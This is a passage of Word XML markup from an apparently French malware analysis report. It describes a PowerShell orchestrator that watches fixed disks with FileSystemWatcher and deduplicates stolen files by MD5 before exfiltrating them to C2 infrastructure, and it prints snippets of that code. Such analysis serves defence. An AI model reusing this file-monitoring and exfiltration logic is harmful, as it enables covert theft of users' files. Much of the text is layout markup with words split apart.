                            <a:pt x="1010920" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1619250" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="161925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916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4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019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4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1216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955700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3537451" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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7451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4.4.5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Surveillance des fichiers en temps réel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1268118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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Au-delà de ces événements programmés et liés au matériel, l’orchestrateur déploie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3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1441473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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également un système de surveillance active des fichiers. Pour commencer, il utilise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4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1614828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1362986" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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29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commande suivante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5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1907522</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5503189" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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3189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Get-WmiObject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Win32_LogicalDisk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|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Where-Object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{ </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle65"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$_</w:t>
                        </w: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.DriveType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-ne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66"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2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};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6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2339998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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Cette commande passe en revue tous les disques logiques non USB, c'est-à-dire les disques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7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2513353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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fixes, y compris la partition système et tou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s les disques locaux secondaires o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u partages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8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2705323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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réseau. Ensuite, l'orchestrateur associe un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System.IO.FileSystemWatcher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 à la racine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9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2901973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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de chaque disque. Ce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watcher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est configuré pour détecter toute modification apportée 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0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3075328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5750824" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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08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dont l'extension correspond exactement à celle des fichiers surveillés sur la clé USB.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1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3360417</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4026530" cy="181622"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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26530" cy="18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86" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle67"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$heSTrjgbmmwf31pvTqeN</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle68"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="1213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69"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314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68"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="1213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70"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve">New-Object</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle68"/>
                            <w:spacing w:val="-1"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> IO.FileSystemWatcher;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3551296</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4945177" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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5177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$heSTrjgbmmwf31pvTqeN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.NotifyFilter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[</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">IO.NotifyFilters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]</w:t>
                        </w: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"FileName,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3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3698616</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4053764" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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376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DirectoryName, Attributes, Size, LastWrite, Security"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4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3845936</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3754678" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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4678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$heSTrjgbmmwf31pvTqeN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.EnableRaisingEvents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63"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$true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5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3993256</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3903904" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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3904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$heSTrjgbmmwf31pvTqeN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.IncludeSubdirectories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63"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$true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;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6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4287896</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5688762" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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8762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$VKynhi5axdxmalgZmv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=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5"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Register-ObjectEvent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1"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$heSTrjgbmmwf31pvTqeN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EventName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7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4435216</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2564689" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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689" cy="14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32" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle46"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">"Changed"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8"/>
                            <w:spacing w:val="-6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Action {[</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">EXFILTRATION</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle32"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">]}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8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4876188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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Cet observateur est configuré pour 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 fonc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tionner de manière récursive et surveille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9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5068158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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spécifiquement l'événement appelé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Changed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, ce qui signifie qu'il se déclenche dès qu'un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0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5264808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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utilisateur enregistre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ou modifie un fichier ciblé. Une fois captu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ré, le chemin d'accès complet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1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5456778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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est récupéré via</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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$Event.SourceEventArgs.FullPath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 et transmis à la fonction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5653428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="815223" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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52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d'exfiltration.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3744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6198260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1354830" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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4830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4.4.6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Exfiltration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4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6510678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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La fonction d'exfiltration gère la déduplication des fichiers cibles afin de garantir que seules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5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6684033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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les données uniques et à forte valeur ajoutée soient exfiltrées vers l'infrastructure C2.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6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6857388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4837046" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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370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fonction est appelée à chaque étape du processus d'acquisition des données.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78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4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886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4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98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4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091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4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193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4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428800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6626869</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4088133" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8813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88130" h="199390">
                          <a:moveTo>
                            <a:pt x="3726180" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3726180" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4088130" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4088130" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2867660" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2867660" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3475990" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3475990" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2001520" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2001520" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2781299" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2781299" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1389380" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1389380" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1915160" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1915160" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="694689" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="694689" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1303020" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1303020" y="199390"/>
                          </a:lnTo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608329" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60832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0848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1999615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7467609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2896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7467609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4944" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3502025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7467609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6992" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2402204</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7467609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1088" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6461759</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7682239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="199390" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9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9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98754" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="198754" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="19939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030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7898139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2846708" cy="777878"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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708" cy="7778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6705" h="777874">
                          <a:moveTo>
                            <a:pt x="641349" y="777874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1742439" y="777874"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="551814" y="760729"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="551814" y="561339"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2846705" y="561339"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2846705" y="760729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918335" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1918335" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="191896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1328" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2642235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8675379</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3376" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1542415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8675379</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="4853939"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="249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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-12" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="4853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4853939">
                          <a:moveTo>
                            <a:pt x="0" y="4853939"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="4853939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485393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542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644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7472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2371089</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5821065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2856276" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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627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16 – Fonctionnement de l’exfiltration de données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8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6073798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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Lorsqu’elle reçoit un chemin d’accès candidat, la fonction convertit la chaîne en minuscules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9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6247153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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et la valide par rapport à une liste d’exclusion codée en dur. Afin d’éviter la collecte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0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6420508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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binaires système ou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 d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e données n’appartenant pas à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l’ut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ilisate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ur, les chemins contenant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1568" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2921635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6612478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883688" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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68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all users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2592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3787774</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6612478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2947553" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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75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default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ou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prog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(ce qui inclut par exemple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361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6612478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2019703" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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970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windows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appdata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public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6807423</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2620312" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0312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dossier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Program Files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 sont écartés.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5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7087258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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Afin de préserver la discrétion et l’efficacité opérationnelles, la fonction met en œuvre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6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7260613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">mécanisme de </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="-4"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> déduplication 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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> locale. 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 Elle génère un fichier de suivi situé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771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7452583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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%UserProfile%</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> (ou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%ProgramData%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 à défaut), nommé à partir des dix premiers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8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7667848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5778905" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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90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</w:rPr>
                          <w:t xml:space="preserve">caractères du GUID de la machine, sans extension de fichier, par exemple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976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7883113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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\Users\Admin\d1a84c20-5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. Ce fichier texte fait office de journal d’historique, contenant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0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8079763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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une liste de condensats MD5 correspondant au contenu précédemment exfiltré. Avant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1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8253118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">lancer un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e exfiltration, la fonction calcule le co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ndensat MD5 du fichier candidat à l’aide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2832" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1471294</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8445088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5265303" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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530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4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Get-FileHash -Algorithm MD5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 et interroge cette base de données locale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3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8446793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="587512" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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1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fonction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8660353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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l’aide de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Select-String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. Si le condensat est présent, le fichier est ignoré ; s’il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5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8857003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2930700" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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07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nouveau, le script passe à l’étape d’exfiltration.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6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9131958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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L’exfiltration est tentée via une infrastructure à plusieurs niveaux comprenant un stockage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7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9305313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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cloud légitime, des serveurs de secours codés en dur et des points de terminaison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8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9478668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1874987" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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49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dynamiques résolus via DDR.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000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5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102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5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204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5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307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5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409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5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48819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6559559</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="351154"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3511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351154">
                          <a:moveTo>
                            <a:pt x="1225550" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1225550" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1225550" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1224915" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1224915" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1225550" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1225550" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1225550" y="351154"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="351154"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1224915" y="351154"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1224915" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="35115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0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7040889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="691514" cy="1066165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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514" cy="10661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1514" h="1066165">
                          <a:moveTo>
                            <a:pt x="0" y="1066165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="691514" y="1066165"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="691514" y="867409"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="867409"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1066165"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="676274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281305" y="676274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="281305" y="477520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="477520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="676274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="198754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="608964" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754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9696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6559559</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="2914649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2914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2914649">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="2914649"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2911475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="2911475"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2521585"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2521585"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1701164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1701164"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1311275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1311275"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="921385"/>
                          </a:moveTo>
                          <a:lnTo>
